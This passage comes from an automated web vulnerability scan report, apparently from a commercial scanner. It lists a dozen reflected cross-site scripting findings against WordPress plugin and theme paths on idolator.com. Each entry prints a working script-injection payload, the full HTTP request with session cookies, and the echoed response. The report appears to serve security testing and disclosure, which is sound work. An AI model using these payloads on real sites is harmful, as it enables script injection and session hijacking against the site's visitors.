Date: Mon, 13 Jun 2011 11:33:24 GMT
Server: Apache
X-Powered-By: PHP/5.3.6
Vary: Cookie,Accept-Encoding
X-Pingback: http://idolator.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Mon, 13 Jun 2011 04:33:24 -0700
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Link: <>; rel=shortlink
Cache-Control: max-age=300, must-revalidate
Content-Length: 36023
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US" xmlns:fb="h
...[SNIP]...
<input type="hidden" name="redirect_to" value="http://idolator.com/wp-content/plugins/wpaudio-mp3-playerea543\"><script>alert(1)</script>b7d35424d0/sm2/soundmanager2-nodebug-jsmin.js?ver=2.8.6" />
...[SNIP]...

4.165. http://idolator.com/wp-content/plugins/wpaudio-mp3-player/sm2/soundmanager2-nodebug-jsmin.js [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://idolator.com
Path:	/wp-content/plugins/wpaudio-mp3-player/sm2/soundmanager2-nodebug-jsmin.js

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6e990"><script>alert(1)</script>c4efd4a2e08 was submitted in the REST URL parameter 4. This input was echoed as 6e990\"><script>alert(1)</script>c4efd4a2e08 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/wpaudio-mp3-player/sm26e990"><script>alert(1)</script>c4efd4a2e08/soundmanager2-nodebug-jsmin.js?ver=2.8.6 HTTP/1.1
Host: idolator.com
Proxy-Connection: keep-alive
Referer: http://idolator.com/wp-content2f889%22%3E%3Cscript%3Ealert(%22FAVICON%22)%3C/script%3Ed06b96a1bc7/themes/idolator_1.5/images/favicon.ico
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=c489d4009ebc793736408e674190920c

Response

HTTP/1.1 404 Not Found
Date: Mon, 13 Jun 2011 11:33:34 GMT
Server: Apache
X-Powered-By: PHP/5.3.6
Vary: Cookie,Accept-Encoding
X-Pingback: http://idolator.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Mon, 13 Jun 2011 04:33:34 -0700
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Link: <>; rel=shortlink
Cache-Control: max-age=300, must-revalidate
Content-Length: 36026
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US" xmlns:fb="h
...[SNIP]...
<input type="hidden" name="redirect_to" value="http://idolator.com/wp-content/plugins/wpaudio-mp3-player/sm26e990\"><script>alert(1)</script>c4efd4a2e08/soundmanager2-nodebug-jsmin.js?ver=2.8.6" />
...[SNIP]...

4.166. http://idolator.com/wp-content/plugins/wpaudio-mp3-player/sm2/soundmanager2-nodebug-jsmin.js [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://idolator.com
Path:	/wp-content/plugins/wpaudio-mp3-player/sm2/soundmanager2-nodebug-jsmin.js

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5aff7"><script>alert(1)</script>ab71aec3e75 was submitted in the REST URL parameter 5. This input was echoed as 5aff7\"><script>alert(1)</script>ab71aec3e75 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/wpaudio-mp3-player/sm2/soundmanager2-nodebug-jsmin.js5aff7"><script>alert(1)</script>ab71aec3e75?ver=2.8.6 HTTP/1.1
Host: idolator.com
Proxy-Connection: keep-alive
Referer: http://idolator.com/wp-content2f889%22%3E%3Cscript%3Ealert(%22FAVICON%22)%3C/script%3Ed06b96a1bc7/themes/idolator_1.5/images/favicon.ico
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=c489d4009ebc793736408e674190920c

Response

HTTP/1.1 404 Not Found
Date: Mon, 13 Jun 2011 11:33:46 GMT
Server: Apache
X-Powered-By: PHP/5.3.6
Vary: Cookie,Accept-Encoding
X-Pingback: http://idolator.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Mon, 13 Jun 2011 04:33:46 -0700
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Link: <>; rel=shortlink
Cache-Control: max-age=300, must-revalidate
Content-Length: 36026
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US" xmlns:fb="h
...[SNIP]...
<input type="hidden" name="redirect_to" value="http://idolator.com/wp-content/plugins/wpaudio-mp3-player/sm2/soundmanager2-nodebug-jsmin.js5aff7\"><script>alert(1)</script>ab71aec3e75?ver=2.8.6" />
...[SNIP]...

4.167. http://idolator.com/wp-content/plugins/wpaudio-mp3-player/sm2/soundmanager2.swf [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://idolator.com
Path:	/wp-content/plugins/wpaudio-mp3-player/sm2/soundmanager2.swf

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 84e2c"><script>alert(1)</script>c4da70b726 was submitted in the REST URL parameter 1. This input was echoed as 84e2c\"><script>alert(1)</script>c4da70b726 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content84e2c"><script>alert(1)</script>c4da70b726/plugins/wpaudio-mp3-player/sm2/soundmanager2.swf HTTP/1.1
Host: idolator.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://idolator.com/wp-content2f889%22%3E%3Cscript%3Ealert(%22FAVICON%22)%3C/script%3Ed06b96a1bc7/themes/idolator_1.5/images/favicon.ico
Cookie: __utma=183537278.1979015884.1307964788.1307964788.1307964788.1; __utmb=183537278.1.10.1307964788; __utmc=183537278; __utmz=183537278.1307964788.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; scorecardresearch=2053908349-1277450644-1307964788542; VWCUKP300=L123100/Q72996_13937_1944_061311_1_070411_445235x444949x061311x1x1; SVWCUKP300=445235_1; __qca=P0-911850542-1307964830101

Response

HTTP/1.1 404 Not Found
Date: Mon, 13 Jun 2011 11:34:41 GMT
Server: Apache
X-Powered-By: PHP/5.3.6
Vary: Cookie,Accept-Encoding
X-Pingback: http://idolator.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Mon, 13 Jun 2011 04:34:41 -0700
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Link: <>; rel=shortlink
Cache-Control: max-age=300, must-revalidate
Content-Length: 35954
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US" xmlns:fb="h
...[SNIP]...
<input type="hidden" name="redirect_to" value="http://idolator.com/wp-content84e2c\"><script>alert(1)</script>c4da70b726/plugins/wpaudio-mp3-player/sm2/soundmanager2.swf" />
...[SNIP]...

4.168. http://idolator.com/wp-content/plugins/wpaudio-mp3-player/sm2/soundmanager2.swf [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://idolator.com
Path:	/wp-content/plugins/wpaudio-mp3-player/sm2/soundmanager2.swf

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b4ac6"><script>alert(1)</script>32f84736faa was submitted in the REST URL parameter 2. This input was echoed as b4ac6\"><script>alert(1)</script>32f84736faa in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/pluginsb4ac6"><script>alert(1)</script>32f84736faa/wpaudio-mp3-player/sm2/soundmanager2.swf HTTP/1.1
Host: idolator.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://idolator.com/wp-content2f889%22%3E%3Cscript%3Ealert(%22FAVICON%22)%3C/script%3Ed06b96a1bc7/themes/idolator_1.5/images/favicon.ico
Cookie: __utma=183537278.1979015884.1307964788.1307964788.1307964788.1; __utmb=183537278.1.10.1307964788; __utmc=183537278; __utmz=183537278.1307964788.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; scorecardresearch=2053908349-1277450644-1307964788542; VWCUKP300=L123100/Q72996_13937_1944_061311_1_070411_445235x444949x061311x1x1; SVWCUKP300=445235_1; __qca=P0-911850542-1307964830101

Response

HTTP/1.1 404 Not Found
Date: Mon, 13 Jun 2011 11:34:51 GMT
Server: Apache
X-Powered-By: PHP/5.3.6
Vary: Cookie,Accept-Encoding
X-Pingback: http://idolator.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Mon, 13 Jun 2011 04:34:52 -0700
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Link: <>; rel=shortlink
Cache-Control: max-age=300, must-revalidate
Content-Length: 35957
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US" xmlns:fb="h
...[SNIP]...
<input type="hidden" name="redirect_to" value="http://idolator.com/wp-content/pluginsb4ac6\"><script>alert(1)</script>32f84736faa/wpaudio-mp3-player/sm2/soundmanager2.swf" />
...[SNIP]...

4.169. http://idolator.com/wp-content/plugins/wpaudio-mp3-player/sm2/soundmanager2.swf [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://idolator.com
Path:	/wp-content/plugins/wpaudio-mp3-player/sm2/soundmanager2.swf

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 62e7e"><script>alert(1)</script>971d8cdf90b was submitted in the REST URL parameter 3. This input was echoed as 62e7e\"><script>alert(1)</script>971d8cdf90b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/wpaudio-mp3-player62e7e"><script>alert(1)</script>971d8cdf90b/sm2/soundmanager2.swf HTTP/1.1
Host: idolator.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://idolator.com/wp-content2f889%22%3E%3Cscript%3Ealert(%22FAVICON%22)%3C/script%3Ed06b96a1bc7/themes/idolator_1.5/images/favicon.ico
Cookie: __utma=183537278.1979015884.1307964788.1307964788.1307964788.1; __utmb=183537278.1.10.1307964788; __utmc=183537278; __utmz=183537278.1307964788.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; scorecardresearch=2053908349-1277450644-1307964788542; VWCUKP300=L123100/Q72996_13937_1944_061311_1_070411_445235x444949x061311x1x1; SVWCUKP300=445235_1; __qca=P0-911850542-1307964830101

Response

HTTP/1.1 404 Not Found
Date: Mon, 13 Jun 2011 11:35:03 GMT
Server: Apache
X-Powered-By: PHP/5.3.6
Vary: Cookie,Accept-Encoding
X-Pingback: http://idolator.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Mon, 13 Jun 2011 04:35:03 -0700
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Link: <>; rel=shortlink
Cache-Control: max-age=300, must-revalidate
Content-Length: 35957
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US" xmlns:fb="h
...[SNIP]...
<input type="hidden" name="redirect_to" value="http://idolator.com/wp-content/plugins/wpaudio-mp3-player62e7e\"><script>alert(1)</script>971d8cdf90b/sm2/soundmanager2.swf" />
...[SNIP]...

4.170. http://idolator.com/wp-content/plugins/wpaudio-mp3-player/sm2/soundmanager2.swf [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://idolator.com
Path:	/wp-content/plugins/wpaudio-mp3-player/sm2/soundmanager2.swf

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fa4a5"><script>alert(1)</script>b8140d6ede4 was submitted in the REST URL parameter 4. This input was echoed as fa4a5\"><script>alert(1)</script>b8140d6ede4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/wpaudio-mp3-player/sm2fa4a5"><script>alert(1)</script>b8140d6ede4/soundmanager2.swf HTTP/1.1
Host: idolator.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://idolator.com/wp-content2f889%22%3E%3Cscript%3Ealert(%22FAVICON%22)%3C/script%3Ed06b96a1bc7/themes/idolator_1.5/images/favicon.ico
Cookie: __utma=183537278.1979015884.1307964788.1307964788.1307964788.1; __utmb=183537278.1.10.1307964788; __utmc=183537278; __utmz=183537278.1307964788.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; scorecardresearch=2053908349-1277450644-1307964788542; VWCUKP300=L123100/Q72996_13937_1944_061311_1_070411_445235x444949x061311x1x1; SVWCUKP300=445235_1; __qca=P0-911850542-1307964830101

Response

HTTP/1.1 404 Not Found
Date: Mon, 13 Jun 2011 11:35:14 GMT
Server: Apache
X-Powered-By: PHP/5.3.6
Vary: Cookie,Accept-Encoding
X-Pingback: http://idolator.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Mon, 13 Jun 2011 04:35:15 -0700
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Link: <>; rel=shortlink
Cache-Control: max-age=300, must-revalidate
Content-Length: 35957
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US" xmlns:fb="h
...[SNIP]...
<input type="hidden" name="redirect_to" value="http://idolator.com/wp-content/plugins/wpaudio-mp3-player/sm2fa4a5\"><script>alert(1)</script>b8140d6ede4/soundmanager2.swf" />
...[SNIP]...

4.171. http://idolator.com/wp-content/plugins/wpaudio-mp3-player/sm2/soundmanager2.swf [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://idolator.com
Path:	/wp-content/plugins/wpaudio-mp3-player/sm2/soundmanager2.swf

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c6144"><script>alert(1)</script>199c16dfceb was submitted in the REST URL parameter 5. This input was echoed as c6144\"><script>alert(1)</script>199c16dfceb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/wpaudio-mp3-player/sm2/soundmanager2.swfc6144"><script>alert(1)</script>199c16dfceb HTTP/1.1
Host: idolator.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://idolator.com/wp-content2f889%22%3E%3Cscript%3Ealert(%22FAVICON%22)%3C/script%3Ed06b96a1bc7/themes/idolator_1.5/images/favicon.ico
Cookie: __utma=183537278.1979015884.1307964788.1307964788.1307964788.1; __utmb=183537278.1.10.1307964788; __utmc=183537278; __utmz=183537278.1307964788.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; scorecardresearch=2053908349-1277450644-1307964788542; VWCUKP300=L123100/Q72996_13937_1944_061311_1_070411_445235x444949x061311x1x1; SVWCUKP300=445235_1; __qca=P0-911850542-1307964830101

Response

HTTP/1.1 404 Not Found
Date: Mon, 13 Jun 2011 11:35:25 GMT
Server: Apache
X-Powered-By: PHP/5.3.6
Vary: Cookie,Accept-Encoding
X-Pingback: http://idolator.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Mon, 13 Jun 2011 04:35:26 -0700
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Link: <>; rel=shortlink
Cache-Control: max-age=300, must-revalidate
Content-Length: 35957
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US" xmlns:fb="h
...[SNIP]...
<input type="hidden" name="redirect_to" value="http://idolator.com/wp-content/plugins/wpaudio-mp3-player/sm2/soundmanager2.swfc6144\"><script>alert(1)</script>199c16dfceb" />
...[SNIP]...

4.172. http://idolator.com/wp-content/themes/idolator_1.5/images/favicon.ico [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://idolator.com
Path:	/wp-content/themes/idolator_1.5/images/favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2f889"><script>alert(1)</script>d06b96a1bc7 was submitted in the REST URL parameter 1. This input was echoed as 2f889\"><script>alert(1)</script>d06b96a1bc7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content2f889"><script>alert(1)</script>d06b96a1bc7/themes/idolator_1.5/images/favicon.ico HTTP/1.1
Host: idolator.com
Proxy-Connection: keep-alive
Referer: http://moviesblog.mtv.com/2011/06/12/game-of-thrones-spoiler-death-sean-bean/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=c489d4009ebc793736408e674190920c

Response

HTTP/1.1 404 Not Found
Date: Mon, 13 Jun 2011 11:23:46 GMT
Server: Apache
X-Powered-By: PHP/5.3.6
Vary: Cookie,Accept-Encoding
X-Pingback: http://idolator.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Mon, 13 Jun 2011 04:23:47 -0700
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Link: <>; rel=shortlink
Cache-Control: max-age=300, must-revalidate
Content-Length: 35927
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US" xmlns:fb="h
...[SNIP]...
<input type="hidden" name="redirect_to" value="http://idolator.com/wp-content2f889\"><script>alert(1)</script>d06b96a1bc7/themes/idolator_1.5/images/favicon.ico" />
...[SNIP]...

4.173. http://idolator.com/wp-content/themes/idolator_1.5/images/favicon.ico [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://idolator.com
Path:	/wp-content/themes/idolator_1.5/images/favicon.ico

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4e8c6"><script>alert(1)</script>d970e60d505 was submitted in the REST URL parameter 2. This input was echoed as 4e8c6\"><script>alert(1)</script>d970e60d505 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/themes4e8c6"><script>alert(1)</script>d970e60d505/idolator_1.5/images/favicon.ico HTTP/1.1
Host: idolator.com
Proxy-Connection: keep-alive
Referer: http://moviesblog.mtv.com/2011/06/12/game-of-thrones-spoiler-death-sean-bean/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=c489d4009ebc793736408e674190920c

Response

HTTP/1.1 404 Not Found
Date: Mon, 13 Jun 2011 11:24:00 GMT
Server: Apache
X-Powered-By: PHP/5.3.6
Vary: Cookie,Accept-Encoding
X-Pingback: http://idolator.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Mon, 13 Jun 2011 04:24:01 -0700
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Link: <>; rel=shortlink
Cache-Control: max-age=300, must-revalidate
Content-Length: 35927
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US" xmlns:fb="h
...[SNIP]...
<input type="hidden" name="redirect_to" value="http://idolator.com/wp-content/themes4e8c6\"><script>alert(1)</script>d970e60d505/idolator_1.5/images/favicon.ico" />
...[SNIP]...

4.174. http://idolator.com/wp-content/themes/idolator_1.5/images/favicon.ico [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://idolator.com
Path:	/wp-content/themes/idolator_1.5/images/favicon.ico

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 38569"><script>alert(1)</script>74c5c8e0719 was submitted in the REST URL parameter 3. This input was echoed as 38569\"><script>alert(1)</script>74c5c8e0719 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/themes/idolator_1.538569"><script>alert(1)</script>74c5c8e0719/images/favicon.ico HTTP/1.1
Host: idolator.com
Proxy-Connection: keep-alive
Referer: http://moviesblog.mtv.com/2011/06/12/game-of-thrones-spoiler-death-sean-bean/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=c489d4009ebc793736408e674190920c

Response

HTTP/1.1 404 Not Found
Date: Mon, 13 Jun 2011 11:24:12 GMT
Server: Apache
X-Powered-By: PHP/5.3.6
Vary: Cookie,Accept-Encoding
X-Pingback: http://idolator.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Mon, 13 Jun 2011 04:24:13 -0700
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Link: <>; rel=shortlink
Cache-Control: max-age=300, must-revalidate
Content-Length: 35927
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US" xmlns:fb="h
...[SNIP]...
<input type="hidden" name="redirect_to" value="http://idolator.com/wp-content/themes/idolator_1.538569\"><script>alert(1)</script>74c5c8e0719/images/favicon.ico" />
...[SNIP]...

4.175. http://idolator.com/wp-content/themes/idolator_1.5/images/favicon.ico [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://idolator.com
Path:	/wp-content/themes/idolator_1.5/images/favicon.ico

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f57bf"><script>alert(1)</script>7618ede8ea9 was submitted in the REST URL parameter 4. This input was echoed as f57bf\"><script>alert(1)</script>7618ede8ea9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/themes/idolator_1.5/imagesf57bf"><script>alert(1)</script>7618ede8ea9/favicon.ico HTTP/1.1
Host: idolator.com
Proxy-Connection: keep-alive
Referer: http://moviesblog.mtv.com/2011/06/12/game-of-thrones-spoiler-death-sean-bean/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=c489d4009ebc793736408e674190920c

Response

HTTP/1.1 404 Not Found
Date: Mon, 13 Jun 2011 11:24:26 GMT
Server: Apache
X-Powered-By: PHP/5.3.6
Vary: Cookie,Accept-Encoding
X-Pingback: http://idolator.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Mon, 13 Jun 2011 04:24:26 -0700
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Link: <>; rel=shortlink
Cache-Control: max-age=300, must-revalidate
Content-Length: 35927
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US" xmlns:fb="h
...[SNIP]...
<input type="hidden" name="redirect_to" value="http://idolator.com/wp-content/themes/idolator_1.5/imagesf57bf\"><script>alert(1)</script>7618ede8ea9/favicon.ico" />
...[SNIP]...

4.176. http://idolator.com/wp-content/themes/idolator_1.5/images/favicon.ico [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://idolator.com
Path:	/wp-content/themes/idolator_1.5/images/favicon.ico

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7a72a"><script>alert(1)</script>34d850d9df7 was submitted in the REST URL parameter 5. This input was echoed as 7a72a\"><script>alert(1)</script>34d850d9df7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/themes/idolator_1.5/images/favicon.ico7a72a"><script>alert(1)</script>34d850d9df7 HTTP/1.1
Host: idolator.com
Proxy-Connection: keep-alive
Referer: http://moviesblog.mtv.com/2011/06/12/game-of-thrones-spoiler-death-sean-bean/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
